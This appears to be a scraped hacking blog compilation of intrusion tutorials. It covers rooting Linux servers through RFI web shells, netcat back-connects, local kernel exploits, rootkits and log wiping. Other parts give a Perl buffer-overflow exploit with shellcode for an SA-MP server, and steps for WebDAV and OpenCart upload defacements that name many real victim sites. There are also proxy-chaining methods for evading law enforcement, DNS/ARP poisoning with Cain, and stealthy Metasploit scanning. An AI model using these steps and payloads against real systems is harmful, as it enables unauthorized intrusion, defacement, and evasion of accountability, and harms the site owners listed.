Server Rooting

This is a tutorial on rooting Linux servers with r57 shell (Or any other shell)
Too bad not many sites are vulnerable these days =/
-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.php?page=

we can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.p...shell.php?

where shell.php is our web shell that we have already uploaded to
our site. (http://www.mysite.com)
After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (http://www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to <IP here> port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

http://www.milw0rm.com (Try Search: "linux kernel")

Other sites: http://www.packetstormsecurity.org
or try Googlin' you can find 'em

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.site.com/shells/h00lyshit.c

where http://www.site.com/shells/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit <very big file on the disk>

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

Read more »

hack GTA SAN ANDRES

# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.

#No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead.
#392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a.

#Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator!

my $file = "server.cfg"; #file must be named server.cfg for bug to trigger.
my $head = "echo "; #probably not needed, tweak if you want.
my $junk = "\x41" x 379;
my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exe
my $nops = "\x90" x 12;
my $adjust = "\x81\xc4\x54\xf2\xff\xff"; #add esp, -3500

my $shellcode =
#x86/shikata_ga_nai succeeded with size 227 (iteration=1)
#Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a'

"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
"\x5e\xa4\xb4";

open($File, ">$file");
print $File $head.$junk.$eip.$nops.$adjust.$shellcode;
close($FILE);

Read more »

How to chain multiple proxies

Introduction:
This is a tutorial on chaining proxies for the use of becoming more anonymous while online. There aren’t enough tutorials online about this subject so I decided to make an attempt at writing one. Since it’s on the subject, I included a section on chaining wingates to become anonymous on telnet.
------------------------------------------------------------------------------------

I’m going to assume that most of you have already used a proxy before to hide your real IP address or domain or maybe just used one to surf anonymously online. If you didn’t, well hopefully you can keep up and possibly learn how to use a proxy. Its also best if you know what an IP address or Domain is first, before reading this tutorial. Hmm, I guess I have to show you where to find a proxy too. Well I find that good, updated proxy websites are…

http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/

It will be up to you to figure out which ones work or not. I’m not going to do all the work for you icon_smile.gif. You can check and see if the proxy works by going to http://www.privacy.net to see if your IP address changed.
------------------------------------------------------------------------------------

Proxy Servers
A proxy is a server that acts as a gateway between your computer and your destination (website, IRC chat, etc.). These proxies receive requests from users to view, for example, a web page. The proxy will then forward the request to the internet, find your requested page, then send the web page back to you, the user. Most proxies come with a cache (sounds like “cash”) feature that saves former websites that were visited on that proxy. Think of cache as a proxy’s storage room. Each site that you make the proxy visit, it saves in its own storage area (cache). So if the user or someone else requests the same site again later on, the proxy will go back into its cache, find the web page and send it back to the user. This saves time because the proxy doesn’t have to go search the Internet for the web page. It just pulls the site out of its cache.

The use of proxies to stay anonymous is a favorite thing to do among people on the Internet who are either paranoid or just security conscious. The anonymity factor comes from the proxy’s ability to hide your true Internet address. For example, if I were to run a scan on your computer right now, I would get the Internet address that was given to you by your ISP (internet service provider), but if I were to scan you while you were using a proxy, then I would get the Internet address of the proxy server. Basically the whole proxy picture looks like this…

[User]>>>>>[Proxy]>>>>>[Web Pages]

Simple enough, right? Right. So now let’s get to the chaining part.

Proxy Chaining
Proxy chaining is merely connecting to more than one proxy and then to your intended destination. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be. Remember, it doesn’t matter how many proxies you chain together, you will never be 100% anonymous. Let’s look at an example…

[User]>>>>>[Proxy1]>>>>>[Proxy2]>>>>>[Proxy3]>>>>>[Proxy4]>>>>>[Destination]

The example shows that for a proxy chain to be created, the user must first connect to Proxy1. Once the user is connected to Proxy1, from Proxy1, the user will connect to Proxy2, from Proxy2, the user will connect to Proxy3, from Proxy3, the user will connect to Proxy4, from Proxy4, the user will then connect to the intended destination (web page, Unix server, ftp server, etc.). All together we have 4 proxies in this example. Each proxy is a link in the chain. If the user would be scanned while on the proxy chain in the example, the IP address or domain of Proxy4 would appear on the scan. Now the problem with proxies is they tend to “die out” in a few weeks or less. It all depends. So if Proxy2 were to cease functioning, the chain wouldn’t work. You would need to get rid of Proxy2 and just use Proxy1, Proxy3, and Proxy4 or find another proxy to take Proxy2’s place. This is why proxy chaining can be a real pain if you are using them just to surf the net. If one dies, you have to figure out which one is the one not working, so you have to go through each one to check them or until you find the one that isn’t working.

Proxy chaining is a necessity if you plan on using proxies to execute a “hack”. If you are attempting to gain unauthorized remote access to any server, whether it is through telnet, ftp, or http, chaining is a must. As I said, you will never be 100% anonymous no matter what you do online so it is possible that you still can be tracked even if u chain proxies. Chaining just makes it a lot hard to track someone. To make it even harder, its best to use foreign proxies because if someone wanted to trace you, they would need to get logs of your use of each proxy from each proxy administrator. This could take quite a while or even never at all if one of the proxy’s, or all for that matter, belong to an admin in a country that isn’t too fond of the country you are located in. The longer it takes for the authorities to subpoena the logs of your usage of a single proxy from that proxy’s administrator, the more chance that the other proxies that you used in the chain will have their logs deleted by the time anyone gets to the server administrators of those proxies. So when attempting to do any kind of “hack”, it’s best to use at least five or six proxies in a chain.

HTTP Chaining
HTTP chaining is basically chaining a proxy server in your browser’s address bar. Example:

http://proxy.magusnet.com/-_-http://www.google.com

Notice how the above proxy and destination (yahoo) are seperated by a (-_-) If you wanted to make a chain out of this you would simply add another proxy ex. ( http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com)

Another way to use proxys in your address bar is by adding the proxy IP or domain then the port number. Example…

http://anon.free.anonymizer.com:80/http://www.google.com

Notice how the above proxy and destination server are seperated this time by a (/) forward slash instead of a (-_-) dash, underscore, dash. To make a chain out of this you would again simply add another proxy ex. ( http://proxy1:80/http://proxy2:80/proxy3:80/http://www.yahoo.com)

Browser Chaining
To browser chain is fairly easy. I’ll use Internet Explorer as an example since I believe it is the browser that most people have and use. First you need to find the Internet Options. You can do this by either finding the Explorer icon on the desktop, right click on it, then press properties or if you have a browser window already opened if you are online then you can go to Tools (or sometimes its View) and press Internet Options. Now that you have the Internet Options window up you can now go to the Connections tab, then go to the first Settings button (not LAN Settings, the one above it) and click it. Now you should be in the Settings box. Put a check in the box where it says to Use a proxy server. Now if you wanted to surf using one proxy you would merely put the proxy in the Address: space and put the proxy’s port number in the Port: space. To use a chain here you would put in a proxy along with a “:” colon then the port number followed by a space separting the next proxy then a “:” colon then the port number then a space and so on. The last proxy you add should have its port number placed inside the Port: space. If you did it, then it should look like this exactly…

Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

***Notice that each proxy:port is separated by a space and that the last proxy has its port number placed in the Port: space. Do not check the box marked “Bypass proxy server for local addresses”. Press OK when you see that everything is in working order***

Wingates
A wingate is a proxy server that someone installs onto his/her computer which allows for a single or multiple online connection to take place through port 23, the default telnet port. Depending on their security, some wingates will allow anyone online to connect to them and usually stay “alive” or “working” anywhere from a few days to even months. There are people out there that scan for these Wingates and post the computer’s IP number or domain on their website to give anyone online a free list of them to use. You can also scan them yourself by using programs like WinScan.

Chaining Wingates Using Telnet
I’m going to assume you already know what telnet is so I will just get right down to it. To chain using telnet, you would first bring up the DOS prompt and type in “telnet” then your wingate. (Since telnet’s default port is 23 and all wingates run on port 23, the port number is not necessary but I will add it just to show you how you should type any port number out on screen) Example…

C:\WINDOWS>telnet 61.133.119.130 23

So now you have “telnet”, a space, the wingate IP, a space, then the port number 23. Once you are connected to the wingate it should look like this…

Wingate>

Now you would type your next wingate and port number in, then press enter like so…

Wingate> 203.207.173.166 23

You can continue to do this until you connected to as many Wingates as you need. Once you are finished with your wingates you would connect to your destination. Example…

WinGate>arbornet.org

So now the entire picture would look something like this…

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

Welcome to the Once and Future M-Net
FreeBSD 4.3 (m-net.arbornet.org) (ttypv)

Enter newuser at the login prompt to create a new account
Enter upgrade at the login prompt to find out about increased access

login:

Funny Family Photos

funny random facts

Selena Gomez Dating

miley cyrus albums, miley cyrus new album

Ariana Grande 2014 Pictures

best lamborghini wallpaper

Sad Girl Pictures

Read more »

Webdav Hacking & Defacing

Hi Guys !
Today i will explain you how to hack & deface webdav sites.
Is really easy , and this tutorial will clearly show you how to do it.
 Let's start...

Open up the 'Map Network Drive'
- Windows XP : Right click on My Computer
- Windows 7 : Click the start bar



Now it will show a new little window.
Click on 'Sign up for online storage of conect to a network server'



A new window will show up , click next.



Again click next.



Now here type in the server's IP or domain that has WebDav enabled.
Ensure to put http:// and the webdav's directory. Otherwise it may not work. Then click next.



Now you'll get a login prompt. Login with these credentials :

User name : wampp
Password : xampp

And click OK.



At the next window you can choose whatever you want. But i prefer leaving it's default name. It's not important. Then click Next again.



Here is the last window , be sure to tick the checkbox 'Open this network place when I click Finish.'
And click Finish !



Now you'll get again the prompt , just login with the same credentials i mentioned before.

And w00t! w00t! , we have access on uploading files now. Just grab and drag with the cursor there an ASPX\ PHP shell (if it's accepts), a index html file or simply a text file.
Then go to your browser and navigate to http://yourslave/webdav/shell.php (replace shell.php with your shell's name). And you'll get access to its server.




So that's it , hope you enjoyed and learned something useful from my tutorial.
some vulns


NOTE : This isn't gonna work with all webdav sites. Hope you understood the vulnerability , (by using the default login credentials when installing webdav)

written by :- -ThatGuy-.A

source devils cafe

Read more »

Home » Wordpress Hacking » wordpress fckeditor upload Vunerablity : Upload Your Deface Remotly

This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here 

1- open Google.com and enter Dork:

• inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

• nurl:Powered By OpenCart

You'll Got a lot of websites by google, select anyone ... For Example i got this one 

• http://www.schoolshopper.com.au/

Then i'll will simply add the vuln URL after the website 

Example

• http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path May be chnaged in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This 

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)

and Now see file upload option and upload your deface or shell

and for checking shell or deface check this url 

• www.site.com/deface.html
• or
• www.site.com/shell.php

I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

comment here if you have any problem in this tut 

some demo for Practice (maybe some websites patched its my old collection so... )

• http://ruthsgarden.com/jaihind.html
• http://www.utahflowers.net/jaihind.html
• http://www.eesnet.org/jaihind.html
• http://bestonlinediscounts.net/
• http://wenrestaurant.com/
• http://ruthsgarden.com/
• http://www.utahflowers.net/
• http://www.inlove.my/
• http://megamall.com.pk/
• http://stefanyboutique.com/
• http://www.virtualgeorge.info/
• http://iphoneclone.biz/
• http://amourcristallis.com/
• http://www.eesnet.org/
• http://www.schoolshopper.com.au/
• http://www.mymaxi.nl/
• http://wiretek.net/
• http://shop.tjokgus.com/
• http://www.aquariumsystem.it/
• http://uae-shopper.com/
• http://organicjewelries.com/
• http://www.granmasantiques.com/
• http://avocadogenie.com/
• http://www.inputandanalysis.com
• http://eddiegifts.com/
• http://bestonlinediscounts.net/
• http://wenrestaurant.com/
• http://ruthsgarden.com/
• http://www.utahflowers.net?/
• http://www.inlove.my/
• http://megamall.com.pk/
• http://stefanyboutique.com?/
• http://www.inputandanalysis.com/
• http://www.virtualgeorge.info/
• http://iphoneclone.biz/
• http://amourcristallis.com?/
• http://www.eesnet.org/
• http://www.schoolshopper.com.au/
• http://www.mymaxi.nl/
• http://wiretek.net/
• http://shop.tjokgus.com/
• http://www.aquariumsystem.it/
• http://uae-shopper.com/
• http://organicjewelries.com/
• http://www.granmasantiques.com/
• http://avocadogenie.com/
• http://www.inputandanalysis.com/
• http://www.utahflowers.net/
• http://stefanyboutique.com/
• http://amourcristallis.com/
  source deviul's cafe

Read more »

.::Introduction to Bots and Botnets::.

.::Introduction to Bots and Botnets::.

The word bot is an abbreviation of the word robot. Robots (automatized programs, not robots like Marvin the Paranoid Android) are frequently used in the Internet world. Spiders used by search engines to map websites and software responding to requests on IRC (such as eggdrop) are robots. Programs which respond autonomously to particular external events are robots, too. This article will describe a special kind of a robot, or bot (as we will call them from now on) – an IRC bot. It uses IRC networks as a communication channel in order to receive commands from a remote user. In this particular case the user is an attacker and the bot is a trojan horse. A good programmer can easily create his own bot, or customize an existing one. This will help hide the bot from basic security systems, and let it easily spread.

IRC

IRC stands for Internet Relay Chat. It is a protocol designed for real time chat communication , based on client-server architecture. Most IRC servers allow free access for everyone. IRC is an open network protocol based on TCP (Transmission Control Protocol), sometimes enhanced with SSL (Secure Sockets Layer).

An IRC server connects to other IRC servers within the same network. IRC users can communicate both in public (on so-called channels) or in private (one to one). There are two basic levels of access to IRC channels: users and operators. A user who creates a channel becomes its operator. An operator has more priviledges (dependent on modes set by the initial operator) than a regular user.

IRC bots are treated no different than regular users (or operators). They are daemon processes, which can run a number of automated operations. Control over these bots is usually based on sending commands to a channel set-up by the attacker, infested with bots. Of course, bot administration requires authentication and authorisation, so that only the owner can use them.

An important feature of such bots is the fact that they are able to spread rapidly to other computers. Careful planning of the infection process helps achieve better results in shorter time (more compromised hosts). A number of n bots connected to a single channel and waiting for commands is called a botnet.

In recent past zombie (another name for bot–infected computers) networks were controlled with the use of proprietary tools, developed intentionally by crackers themselves. Experience has lead to experiments with new remote control methods. IRC is considered the best way to launch attacks, because it is flexible, easy to use and especially because public servers can be used as a communication medium (see Inset IRC). IRC offers a simple method to control hundreds or even thousands of bots at once in a flexible manner. It also allows attackers to cover their identity with the use of simple tricks such as anonymous proxies or simple IP address spoofing. Thanks to this, server administrators have little chance to find the origin of an attack controlled in such a manner.

In most cases bots infect single user PCs, university servers or small company networks. This is because such machines are not strictly monitored, and often left totally unprotected. The reason for this is partially the lack of a real security policy, but mostly the fact that most PC users with an ADSL connection are completely unaware of the risks involved, and do not use protective software such as antivirus tools or personal firewalls.

.::Bots and their Applications::.

The possible uses for compromised hosts depend only on the imagination and skills of an attacker. Let's look at the most common ones.

DDoS

Botnets are frequently used for Distributed Denial of Service attacks. An attacker can control a large number of compromised hosts from a remote workstation, exploiting their bandwidth and sending connection requests to the target host. Many networks suffered from such attacks, and in some cases the culprits were found amongst competition (as in the case of dotcom wars).

Distributed DoS Attacks (DDoS)

A DDoS attack is a variation of a Flooding DoS attack; its aim is to saturate a target network, using all the available bandwidth. That being said, and presuming that an attacker should have huge total bandwidth available in order to saturate the targeted site, it is clear that the best way to launch this type of an attack is to have many different hosts under control. Each host introduces its own bandwidth (ex. PC ADSL users), and they are used all at once, thus distributing the attack on the target site. One of the most popular attacks performed with the use of the TCP protocol (a connection oriented protocol), is called TCP syn flooding. It works by sending a large number of TCP connection requests to the same web server (or to any other type of service), overloading the server's resources and leading to its saturation, preventing other users from opening their own connections. How simple and dangerously efficient! We can achieve the same by using the UDP protocol (a connectionless protocol).

Attackers have spent a lot of time and effort on improving such attacks. We are now facing even better techniques, which differ from traditional DDoS attacks. They let malicious users control a very large number of zombie hosts from a remote workstation, by using, for example, the IRC protocol.

Spamming

Botnets are an ideal medium for spammers. They could be used, and are used, both for exchanging collected e–mail addresses and for controlling spam streaks in the same way DDoS attacks are performed. Single spam message could be sent to the botnet and then distributed across bots, which send the spam. The spammer stays anonymous and all the blame goes to infected computers.

Sniffing & Keylogging

Bots can also be effectively used to enhance the ancient art of sniffing. Observing traffic data can lead to detection of an incredible amount of information. This includes user habits, TCP packet payload which could contain interesting information (such as passwords). The same applies to keylogging – capturing all the information typed in by the user (e–mails, passwords, home banking data, PayPal account info etc.).

Identity Theft

The abovementioned methods allow an attacker controlling a botnet to collect an incredible amount of personal information. Such data can then be used to build fake identities, which can in turn be used to obtain access to personal accounts or perform various operations (including other attacks) putting the blame on someone else.

Hosting of Illegal Software

Last, but not least, bot–compromised computers can be used as a dynamic repository of illegal material (pirated software, pornography, etc.). The data is stored on the disk of an unaware ADSL user.

Hours could be spent talking about the possible applications of botnets (for example pay per click abuse, phishing, hijacking HTTP/HTTPS connections etc.). Bots alone are only tools, which can easily be adapted to every task which requires a great number of hosts under single control.

.::Different Types of Bots::.

Many types of ready–made bots are available for download from the Internet. Each of them has its own special features. Let's have a look at the most popular bots, outlining common features and distinctive elements.

GT–Bot

All the GT (Global Threat) bots are based on a popular IRC client for Windows called mIRC. The core of these bots is made up of a set of mIRC scripts, which are used to control the activity of the remote system. This type of bot launches an instance of the client enhanced with control scripts and uses a second application, usually HideWindow, to make mIRC invisible to the user of the host computer. An additional DLL file adds new features to mIRC in order for scripts to be able to influence various aspects of the controlled host.

Agobot

Agobot is probably one of the most popular bots used by crackers. It is written in C++ and released on a GPL licence. What is interesting about Agobot is its source code. Highly modular, it makes it simple to add new functions. Agobot provides many mechanisms to hide its presence on the host computer. They include: NTFS Alternate Data Stream, Antivirus Killer and the Polymorphic Encryptor Engine. Agobot offers traffic sniffing and sorting functionality. Protocols other than IRC can also be used to control this bot.

DSNX

The Dataspy Network X bot is also written in C++ and its source code is also available on a GPL licence. Adding new functionality to this bot is very easy thanks to its simple plug–in architecture.

SDBot

SDBot is written in C and also available on a GPL licence. Unlike Agobot, its code is not very clear and the software itself comes with a limited set of features. Nevertheless, it is still very popular and available in different variants.

.::The Elements of an Attack::.



    An attacker first spreads a trojan horse, which infects various hosts. These hosts become zombies and connect to the IRC server in order to listen to further commands.
    The IRC server can either be a public machine in one of the IRC networks or a dedicated server installed by the attacker on one of the compromised hosts.
    Bots run on compromised computers, forming a botnet.


.::A Practical Example::.

The activity of the attacker can be split into four different stages:

    creation
    configuration
    infection
    control

The creation stage is largely dependent on attacker skills and requirements. A cracker can decide whether to write their own bot code or simply extend or customise an existing one. A wide range of ready–made bots are available and highly configurable. This is made even easier via a graphical interface. No wonder this is the option most often used by script kiddies.

The configuration stage involves supplying IRC server and channel information. Once installed on the compromised machine, the bot will connect to the selected host. An attacker first enters data necessary to restrict access to the bots, secures the channel and finally provides a list of authorised users (who will be able to control the bots). In this stage the bot can be further customised, for example by defining the target and attack method.

The infection stage involves using various techniques to spread the bots – both direct and indirect. Direct techniques include exploiting vulnerabilities of the operating system or services. Indirect attacks employ other software for the dirty work – they include using malformed HTML files exploiting Internet Explorer vulnerabilities, or using other malware distributed through peer–to–peer networks or through DCC (Direct Client–to–Client) file exchange on IRC. Direct attacks are usually automated with the use of worms. All worms have to do is search the subnets for vulnerable systems and inject the bot code. Each infected system then continues the infection process, allowing the attacker to save precious resources and providing plenty of time to look for other victims.

The mechanisms used to distribute bots are one of the main reasons for so–called Internet background noise. The main ports involved are the ones used by Windows, in particular Windows 2000 and XP SP1 (see Table 1). They seem to be the attackers' favourite target, because it is easy to find unpatched Windows computers or ones without firewalls installed. It is often the case with home PC users and small businesses, which overlook security issues and have an always-on broadband Internet connection.

The control stage involves actions after the bot is installed on the target host in a selected directory. In order to start with Windows, it updates the Windows registry keys, usually HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\. The first thing the bot does after it is successfully installed is connecting to an IRC server and joining the control channel with the use of a password. The nickname on IRC is randomly generated. The bot is then ready to accept commands from the master application. The attacker must also use a password to connect to the botnet. This is necessary, so that nobody else can use the supplied botnet.



IRC not only provides the means to control hundreds of bots, but also allows the attacker to use various techniques in order to hide his real identity. This makes it difficult to respond to attacks. Fortunately botnets, by their nature, generate suspected traffic, which is easily detectable due to known patterns. This helps IRC administrators in detection and intervention, allowing them to take the botnet down and report the abuse.

Attackers are forced to refine their C&C (Control and Command) techniques, which leads to botnet hardening. The bots are therefore often configured to connect to different servers using a dynamically mapped hostname. This way an attacker can easily move the bots to new servers, keeping them under control even after detection. Dynamic DNS services such as dyndns.com or no–ip.com are used for this task.

Read more »

DNS poisoning using Cain

Hey guys Smile this Tutorial is about DNS poisoning on your network using Cain & Abel.

Download Cain here http://www.oxid.it/cain.html

This Tutorial Will be limited to just redirecting the traffic to another website.



Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)



First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for
computers, services, or any resource connected to the internet or a
private network. It associates various information with domain names
assigned to each of the participants. Most importantly, it translates
domain names meaningful to humans into the numerical (binary)
identifiers associated with networking equipment for the purpose of
locating and addressing these devices worldwide. An often used analogy
to explain the Domain Name System is that it serves as the "phone book"
for the Internet by translating human-friendly computer hostnames into
IP addresses. For example, http://www.example.com translates to 208.77.188.166.



What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.



First This is the structure of the network :

Board Image

1 , 2 and 3 are computers



1 is the computer being the gateway (could be a router) (172.128.254.1)



2 is the target computer (172.128.254.10)



3 is the attacker using cain



Note : IPs are just used for this tutorial and chosen randomly.



Our work is on computer number 3.

__________________________________________________  ______



1-After you install cain , open it and go to the sniffer tab



2-Click on configure and choose your adapter

Board Image

3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)



4-Right click in the empty area and choose scan MAC addresses. We get the results above.



5-Click on the APR Tab

Board Image

6-Click on the + sign in the toolbar to add a new ARP poison routing

Board Image

7-choose the gateway which is 172.128.254.1 , in the next list you’ll
get the IP of the computer 2 which is 172.128.254.10 and click ok

Board Image

8-now click on the APR-DNS tab

Board Image



9-click on the + sign



10-enter the web address that you want to spoof , (in this case when the
user goes to facebook he’ll be redirected to myspace) click on resolve
type the web address that you want to redirect the user to it, and click
ok, and you’ll get the IP of the web address, then click ok

Board Image

you'll get something like this:

Board Image

11-now to make this work we have to enable APR poisoning , click on the
icon next to the sniffer icon, and everything should work as we expect.



Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .

Imagine what you can do with this technique.



I hope this was a good tutorial for you guys , and please leave your feedback.
      

-----------------------

Read more »

Using metasploit and its exploits

Welcome again to another ultra noob edition production. :) I know everyone likes colors but I am indeed just going to be very straightforward since I'm in happy land right now.

NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.

First off we are going to set up metasploit with postgresql. (which I use... but you can also use sqlite3 or mysql) These Structured Query Language (SQL) databases are going to be what hold the information of a target after scans and such.

For those of you using windows, you can go here.

Click Me!

For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu here!

To download backtrack you can go here!

So once you have postgresql and its deamon running you need to run the following commands to create a user and password for your metasploit database.

In blackbuntu and backtrack 5 you will use the commands

Code:

service postgresql start

In backtrack 4r2 and below use;

Code:

/etc/init.d/postgresql-8.3 start

Note: you might have postgresql-8.4 as i do... so replace the 3 with a 4.

Code:

sudo su postgres -c psql
  ALTER USER postgres WITH PASSWORD 'your password';

  \q

  sudo passwd -d postgres
  sudo su postgres -c passwd

Note: if using backtrack ignore the sudo commands as you are already root.

What this does is set up a user postgres with whatever password you choose.

Now to create/connect to the postgresql database in metasploit you need to use the commands. Once inside metasploit.

Code:

db_connect postgres:yourpassword@127.0.0.1/msf3

This will create a postgresql database called msf3 if you haven't already. If you have it will just connect to it. (As shown in mine)
This is where the show really gets going.
Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan.

To use a ping scan with nmap you would use nmap from the db_nmap command because it automatically adds hosts in the network to your new postgresql database.

Code:

db_nmap -Pn -v 192.168.1.1-255

Now the -Pn argument tells nmap to run a ping scan on port 80 to decide what hosts are up and will add them to your database, while the -v command tells nmap to run in verbose mode giving you more detailed feedback while the scan is running.
Now after you have a list of live hosts you can run nmap in a new mode.

Code:

db_nmap -sS -sV -sU -n -O -v 192.168.1.4

NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.
THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.

Now i run the ip 192.168.1.4 because that is what is currently on my network.
The -sS command runs a stealth syn scan which does not create a full tcp connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port which will come into play when selecting an exploit to use.
